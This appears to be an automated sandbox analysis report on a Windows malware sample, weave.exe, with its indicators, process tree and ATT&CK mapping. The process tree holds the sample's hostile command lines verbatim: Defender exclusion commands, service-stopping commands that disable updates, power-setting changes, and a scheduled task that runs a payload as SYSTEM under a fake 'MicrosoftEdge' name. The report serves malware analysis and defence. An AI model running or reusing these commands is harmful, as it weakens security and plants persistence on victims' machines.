Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
07/09/2024, 13:56
Static task
static1
Behavioral task
behavioral1
Sample
weave.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
weave.exe
Resource
win10v2004-20240802-en
General
-
Target
weave.exe
-
Size
17.8MB
-
MD5
b9ec0212995c8dd4b78a72446c228d4a
-
SHA1
cb754a76810593ae00c4d67fd21cd4eadd5c7eca
-
SHA256
f10ced67a54ca6ec4b98bae2c08f638497a40577313a606501d795606fcc7bfc
-
SHA512
b5b1287af9f0792b99f7f899d09de2984fea119b44bfc79c55a2c6744ff366ea4a5334bd9a3b193aa7995f2f26c0eb1462c14fc80277046c84f66c0f045e6b58
-
SSDEEP
393216:JRpSJkWPZL21pW14nw8qXknD1jSq/CLP9WU/8bJB+x/XQFWe:JRpSJkeYWCnaXUD1jSq/Ckf+x/XQ
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
description pid Process procid_target PID 3044 created 1360 3044 updater.exe 21 PID 3044 created 1360 3044 updater.exe 21 PID 3044 created 1360 3044 updater.exe 21 PID 3044 created 1360 3044 updater.exe 21 PID 3044 created 1360 3044 updater.exe 21 PID 3044 created 1360 3044 updater.exe 21 PID 884 created 1360 884 updater.exe 21 PID 884 created 1360 884 updater.exe 21 PID 884 created 1360 884 updater.exe 21 PID 884 created 1360 884 updater.exe 21 PID 884 created 1360 884 updater.exe 21 PID 884 created 1360 884 updater.exe 21 PID 884 created 1360 884 updater.exe 21 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cli_gui.exe -
pid Process 2484 powershell.exe 2180 powershell.exe 2876 powershell.exe 2664 powershell.exe 608 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cli_gui.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cli_gui.exe -
Executes dropped EXE 3 IoCs
pid Process 2804 cli_gui.exe 3044 updater.exe 884 updater.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx svchost.exe -
Loads dropped DLL 4 IoCs
pid Process 1716 weave.exe 2904 conhost.exe 1716 weave.exe 1444 taskeng.exe -
resource yara_rule behavioral1/files/0x00070000000186d9-14.dat themida behavioral1/memory/2804-20-0x000000013F1E0000-0x000000013FA94000-memory.dmp themida behavioral1/memory/2804-35-0x000000013F1E0000-0x000000013FA94000-memory.dmp themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cli_gui.exe -
Power Settings 1 TTPs 10 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 2344 powercfg.exe 2404 powercfg.exe 2272 cmd.exe 2136 powercfg.exe 2216 powercfg.exe 628 powercfg.exe 1688 powercfg.exe 2084 powercfg.exe 3000 powercfg.exe 2004 cmd.exe -
Drops file in System32 directory 8 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\System32\Tasks\MicrosoftEdge svchost.exe File opened for modification C:\Windows\System32\Tasks\MicrosoftEdge svchost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\syscfg.cfg weave.exe File created C:\Windows\system32\updater.exe weave.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 1716 weave.exe 1716 weave.exe 1716 weave.exe 1716 weave.exe 2804 cli_gui.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 3044 set thread context of 2500 3044 updater.exe 47 PID 884 set thread context of 1580 884 updater.exe 71 PID 884 set thread context of 1176 884 updater.exe 78 PID 884 set thread context of 1380 884 updater.exe 79 -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Microsoft\Edge\updater.exe updater.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\appcompat\programs\RecentFileCache.bcf svchost.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2916 sc.exe 1856 sc.exe 1572 sc.exe 2188 sc.exe 2356 sc.exe 1948 sc.exe 1488 sc.exe 2264 sc.exe 2336 sc.exe 2984 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language weave.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 20f93bc22d01db01 powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1952 schtasks.exe 824 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1716 weave.exe 1716 weave.exe 1716 weave.exe 1716 weave.exe 1716 weave.exe 1716 weave.exe 2876 powershell.exe 3044 updater.exe 3044 updater.exe 2664 powershell.exe 3044 updater.exe 3044 updater.exe 3044 updater.exe 3044 updater.exe 3044 updater.exe 3044 updater.exe 3044 updater.exe 3044 updater.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2484 powershell.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 3044 updater.exe 3044 updater.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe 2500 dialer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2876 powershell.exe Token: SeDebugPrivilege 2664 powershell.exe Token: SeDebugPrivilege 2500 dialer.exe Token: SeShutdownPrivilege 2084 powercfg.exe Token: SeDebugPrivilege 2484 powershell.exe Token: SeShutdownPrivilege 2136 powercfg.exe Token: SeShutdownPrivilege 2216 powercfg.exe Token: SeShutdownPrivilege 3000 powercfg.exe Token: SeAuditPrivilege 848 svchost.exe Token: SeAuditPrivilege 848 svchost.exe Token: SeDebugPrivilege 608 powershell.exe Token: SeShutdownPrivilege 628 powercfg.exe Token: SeShutdownPrivilege 1688 powercfg.exe Token: SeDebugPrivilege 1580 dialer.exe Token: SeAuditPrivilege 848 svchost.exe Token: SeDebugPrivilege 2180 powershell.exe Token: SeShutdownPrivilege 2344 powercfg.exe Token: SeShutdownPrivilege 2404 powercfg.exe Token: SeDebugPrivilege 884 updater.exe Token: SeLockMemoryPrivilege 1380 dialer.exe Token: SeAssignPrimaryTokenPrivilege 848 svchost.exe Token: SeIncreaseQuotaPrivilege 848 svchost.exe Token: SeSecurityPrivilege 848 svchost.exe Token: SeTakeOwnershipPrivilege 848 svchost.exe Token: SeLoadDriverPrivilege 848 svchost.exe Token: SeSystemtimePrivilege 848 svchost.exe Token: SeBackupPrivilege 848 svchost.exe Token: SeRestorePrivilege 848 svchost.exe Token: SeShutdownPrivilege 848 svchost.exe Token: SeSystemEnvironmentPrivilege 848 svchost.exe Token: SeUndockPrivilege 848 svchost.exe Token: SeManageVolumePrivilege 848 svchost.exe Token: SeAssignPrimaryTokenPrivilege 848 svchost.exe Token: SeIncreaseQuotaPrivilege 848 svchost.exe Token: SeSecurityPrivilege 848 svchost.exe Token: SeTakeOwnershipPrivilege 848 svchost.exe Token: SeLoadDriverPrivilege 848 svchost.exe Token: SeSystemtimePrivilege 848 svchost.exe Token: SeBackupPrivilege 848 svchost.exe Token: SeRestorePrivilege 848 svchost.exe Token: SeShutdownPrivilege 848 svchost.exe Token: SeSystemEnvironmentPrivilege 848 svchost.exe Token: SeUndockPrivilege 848 svchost.exe Token: SeManageVolumePrivilege 848 svchost.exe Token: SeAssignPrimaryTokenPrivilege 848 svchost.exe Token: SeIncreaseQuotaPrivilege 848 svchost.exe Token: SeSecurityPrivilege 848 svchost.exe Token: SeTakeOwnershipPrivilege 848 svchost.exe Token: SeLoadDriverPrivilege 848 svchost.exe Token: SeSystemtimePrivilege 848 svchost.exe Token: SeBackupPrivilege 848 svchost.exe Token: SeRestorePrivilege 848 svchost.exe Token: SeShutdownPrivilege 848 svchost.exe Token: SeSystemEnvironmentPrivilege 848 svchost.exe Token: SeUndockPrivilege 848 svchost.exe Token: SeManageVolumePrivilege 848 svchost.exe Token: SeAssignPrimaryTokenPrivilege 848 svchost.exe Token: SeIncreaseQuotaPrivilege 848 svchost.exe Token: SeSecurityPrivilege 848 svchost.exe Token: SeTakeOwnershipPrivilege 848 svchost.exe Token: SeLoadDriverPrivilege 848 svchost.exe Token: SeSystemtimePrivilege 848 svchost.exe Token: SeBackupPrivilege 848 svchost.exe Token: SeRestorePrivilege 848 svchost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1716 weave.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1716 wrote to memory of 2804 1716 weave.exe 30 PID 1716 wrote to memory of 2804 1716 weave.exe 30 PID 1716 wrote to memory of 2804 1716 weave.exe 30 PID 1716 wrote to memory of 2804 1716 weave.exe 30 PID 1716 wrote to memory of 3044 1716 weave.exe 32 PID 1716 wrote to memory of 3044 1716 weave.exe 32 PID 1716 wrote to memory of 3044 1716 weave.exe 32 PID 1716 wrote to memory of 3044 1716 weave.exe 32 PID 2804 wrote to memory of 2184 2804 cli_gui.exe 33 PID 2804 wrote to memory of 2184 2804 cli_gui.exe 33 PID 2804 wrote to memory of 2184 2804 cli_gui.exe 33 PID 2184 wrote to memory of 2876 2184 cmd.exe 34 PID 2184 wrote to memory of 2876 2184 cmd.exe 34 PID 2184 wrote to memory of 2876 2184 cmd.exe 34 PID 2804 wrote to memory of 2840 2804 cli_gui.exe 35 PID 2804 wrote to memory of 2840 2804 cli_gui.exe 35 PID 2804 wrote to memory of 2840 2804 cli_gui.exe 35 PID 1912 wrote to memory of 2916 1912 cmd.exe 40 PID 1912 wrote to memory of 2916 1912 cmd.exe 40 PID 1912 wrote to memory of 2916 1912 cmd.exe 40 PID 1912 wrote to memory of 1856 1912 cmd.exe 41 PID 1912 wrote to memory of 1856 1912 cmd.exe 41 PID 1912 wrote to memory of 1856 1912 cmd.exe 41 PID 1912 wrote to memory of 1572 1912 cmd.exe 42 PID 1912 wrote to memory of 1572 1912 cmd.exe 42 PID 1912 wrote to memory of 1572 1912 cmd.exe 42 PID 1912 wrote to memory of 1488 1912 cmd.exe 43 PID 1912 wrote to memory of 1488 1912 cmd.exe 43 PID 1912 wrote to memory of 1488 1912 cmd.exe 43 PID 1912 wrote to memory of 2264 1912 cmd.exe 44 PID 1912 wrote to memory of 2264 1912 cmd.exe 44 PID 1912 wrote to memory of 2264 1912 cmd.exe 44 PID 3044 wrote to memory of 2500 3044 updater.exe 47 PID 2272 wrote to memory of 2084 2272 cmd.exe 50 PID 2272 wrote to memory of 2084 2272 cmd.exe 50 PID 2272 wrote to memory of 2084 2272 cmd.exe 50 PID 2500 wrote to memory of 424 2500 dialer.exe 5 PID 2500 wrote to memory of 480 2500 dialer.exe 6 PID 2500 wrote to memory of 488 2500 dialer.exe 7 PID 2500 wrote to memory of 496 2500 dialer.exe 8 PID 2500 wrote to memory of 600 2500 dialer.exe 9 PID 2500 wrote to memory of 676 2500 dialer.exe 10 PID 2500 wrote to memory of 760 2500 dialer.exe 11 PID 2500 wrote to memory of 808 2500 dialer.exe 12 PID 2500 wrote to memory of 848 2500 dialer.exe 13 PID 2500 wrote to memory of 960 2500 dialer.exe 15 PID 2500 wrote to memory of 112 2500 dialer.exe 16 PID 2272 wrote to memory of 2136 2272 cmd.exe 51 PID 2272 wrote to memory of 2136 2272 cmd.exe 51 PID 2272 wrote to memory of 2136 2272 cmd.exe 51 PID 2500 wrote to memory of 908 2500 dialer.exe 17 PID 2500 wrote to memory of 268 2500 dialer.exe 18 PID 2500 wrote to memory of 1140 2500 dialer.exe 19 PID 2500 wrote to memory of 1268 2500 dialer.exe 20 PID 2500 wrote to memory of 1360 2500 dialer.exe 21 PID 2500 wrote to memory of 2036 2500 dialer.exe 23 PID 2500 wrote to memory of 1436 2500 dialer.exe 24 PID 2500 wrote to memory of 2556 2500 dialer.exe 26 PID 2500 wrote to memory of 2584 2500 dialer.exe 27 PID 2500 wrote to memory of 2804 2500 dialer.exe 30 PID 2500 wrote to memory of 2904 2500 dialer.exe 31 PID 2500 wrote to memory of 3044 2500 dialer.exe 32 PID 2500 wrote to memory of 2272 2500 dialer.exe 45 PID 2500 wrote to memory of 2116 2500 dialer.exe 46 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:424
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:480
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:600
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:2036
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding3⤵
- Checks processor information in registry
PID:660
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding3⤵PID:1788
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:676
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
- Indicator Removal: Clear Windows Event Logs
PID:760
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:808
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1268
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:848 -
C:\Windows\system32\taskeng.exetaskeng.exe {86CA94B0-A318-4AAD-9A4E-604FC7822AF5} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Loads dropped DLL
PID:1444 -
C:\Program Files\Microsoft\Edge\updater.exe"C:\Program Files\Microsoft\Edge\updater.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:884
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:960
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:112
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:908
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:268
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1140
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:1436
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:2556
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:2584
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:488
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:496
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1360
-
C:\Users\Admin\AppData\Local\Temp\weave.exe"C:\Users\Admin\AppData\Local\Temp\weave.exe"2⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Users\Admin\AppData\Local\Temp\cli_gui.exe"C:\Users\Admin\AppData\Local\Temp\cli_gui.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\windows\system32'" > NUL 2>&14⤵
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\windows\system32'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls4⤵PID:2840
-
-
-
C:\Windows\system32\updater.exe"C:\Windows\system32\updater.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3044
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2664
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2916
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1856
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1572
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1488
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2264
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2084
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2136
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2216
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3000
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lfvbfbo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MicrosoftEdge' /tr '''C:\Program Files\Microsoft\Edge\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Microsoft\Edge\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MicrosoftEdge' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2484 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn MicrosoftEdge /tr "'C:\Program Files\Microsoft\Edge\updater.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1952
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "MicrosoftEdge"2⤵PID:2996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:608
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:2140
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2336
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2984
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2188
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2356
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1948
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
PID:2004 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:628
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1688
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2404
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lfvbfbo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MicrosoftEdge' /tr '''C:\Program Files\Microsoft\Edge\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Microsoft\Edge\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MicrosoftEdge' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2180 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn MicrosoftEdge /tr "'C:\Program Files\Microsoft\Edge\updater.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:824
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:1176
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1380
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-743956530506403107-819442062-740216718-1289033790592825782-20985488252825245"1⤵
- Loads dropped DLL
PID:2904
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1142502481378323210-991980120-2056594498-4986613365445904663295488911169224046"1⤵PID:2116
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "359905632113573363019210769058569778892068114362-1201310452175789054880889790"1⤵PID:436
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1251782746-717108039-477871531398668089-1092486916-667137885-1691740102072276938"1⤵PID:552
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1083449861-2108413420-1355087049157415711-252882950151193202-1823592165544936012"1⤵PID:2028
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "9168119241249602565-1389047746-1594876355-2087640205345477491-19206243851190049973"1⤵PID:2132
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1489051477-1800397954-2095900297110727475833568347129777717510402724772105428914"1⤵PID:1500
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1299307100-2634851289295178-27279761312905484681312486948736264037691820880"1⤵PID:2848
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Indicator Removal
1Clear Windows Event Logs
1Modify Registry
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD548c63296c49e69ca5e3db706f150d3d5
SHA1afdcd1cd94d21f957c252987189a3879fa989821
SHA256fafad4344f3351fb4ad055b5ee494c22918b578bb92c4daea664212fafff0aba
